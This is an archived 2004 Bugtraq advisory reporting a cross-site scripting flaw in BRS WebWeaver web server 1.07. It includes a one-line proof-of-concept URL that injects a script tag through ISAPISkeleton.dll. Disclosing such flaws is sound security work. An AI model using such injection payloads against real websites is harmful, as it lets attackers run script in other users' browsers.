lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <40179E55.1070802@gmx.de> Date: Wed, 28 Jan 2004 12:34:45 +0100 From: Oliver Karow <oliver.karow@....de> To: bugtraq@...urityfocus.com Subject: BRS WebWeaver Webserver Cross Site Scripting Vulnerability BRS WebWeaver Webserver Cross Site Scripting Vulnerability ================================================ Whatis: ===== BRS WebWeaver is a free personal web server that runs on the Windows platform. Version: ====== V 1.07 Exploiting: ======= http://127.0.0.1/scripts/ISAPISkeleton.dll?<script>alert("Ooops!")</script> Vendor: ====== http://www.brswebweaver.com Credit: ===== www.oliverkarow.de